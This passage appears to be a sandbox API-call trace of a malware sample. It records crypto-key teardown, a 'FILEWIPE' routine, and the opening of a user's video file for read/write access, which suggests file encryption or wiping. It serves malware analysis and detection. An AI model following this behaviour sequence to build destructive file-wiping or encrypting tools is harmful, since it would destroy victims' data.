hHeap=0x8a0000) returned 1 [0199.525] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.529] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.529] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0199.530] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.533] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.533] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.533] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0199.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0199.533] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0199.533] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0199.534] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0199.534] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.534] CryptDestroyKey (hKey=0x90aed8) returned 1 [0199.534] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0199.534] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0199.534] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0199.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0199.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0199.534] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0199.534] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0199.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0199.534] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0199.534] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0199.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0199.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0199.535] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0199.535] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0199.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0199.535] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0199.535] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0199.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0199.535] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0199.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0199.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0199.535] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0199.535] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0199.535] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.535] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0199.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0199.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0199.535] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.535] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0199.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0199.535] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0199.535] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0199.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0199.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0199.535] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.536] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0199.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0199.536] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0199.536] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.536] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0199.536] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0199.536] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0199.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0199.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0199.536] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0199.536] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.536] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0199.536] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.536] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0199.536] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0199.536] FreeLibrary (hLibModule=0x74f20000) returned 1 [0199.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0199.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0199.536] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0199.536] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0199.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0199.537] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.537] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.537] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.538] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.538] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0199.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0199.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0199.538] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.538] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.539] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\IoPtJD0U8Gbyjv6.swf", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf92ed7c0, ftCreationTime.dwHighDateTime=0x1d5de34, ftLastAccessTime.dwLowDateTime=0xb5fc0d50, ftLastAccessTime.dwHighDateTime=0x1d5e5ba, ftLastWriteTime.dwLowDateTime=0xb5fc0d50, ftLastWriteTime.dwHighDateTime=0x1d5e5ba, nFileSizeHigh=0x0, nFileSizeLow=0xb336, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="IoPtJD0U8Gbyjv6.swf", cAlternateFileName="IOPTJD~1.SWF")) returned 0x90ae18 [0199.539] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0199.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0199.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0199.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0199.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0199.539] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.539] CharLowerBuffW (in: lpsz="byte[45878]", cchLength=0xb | out: lpsz="byte[45878]") returned 0xb [0199.539] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.539] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0199.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0199.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0199.539] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.539] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0199.539] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0199.540] FreeLibrary (hLibModule=0x75c90000) returned 1 [0199.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0199.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0199.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0199.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0199.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0199.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0199.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0199.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0199.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0199.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0199.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0199.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0199.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0199.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0199.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0199.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0199.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0199.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0199.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0199.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0199.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0199.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0199.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0199.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0199.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0199.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0199.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0199.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0199.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0199.541] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.541] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.541] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.541] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0199.541] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.541] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.541] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.541] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.541] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.541] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.541] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.541] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.541] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.541] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.541] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.541] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.541] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.541] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.541] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.541] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.542] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0199.542] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0199.542] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\IoPtJD0U8Gbyjv6.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z58zbpazzgtth\\ioptjd0u8gbyjv6.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0199.542] FreeLibrary (hLibModule=0x75990000) returned 1 [0199.542] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.542] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.542] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.542] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0199.542] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.542] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.542] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0199.543] FreeLibrary (hLibModule=0x75990000) returned 1 [0199.543] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.548] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.549] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.549] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.549] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0199.549] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.549] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.549] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0199.549] FreeLibrary (hLibModule=0x75990000) returned 1 [0199.549] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.549] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.549] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.549] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\IoPtJD0U8Gbyjv6.swf", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: 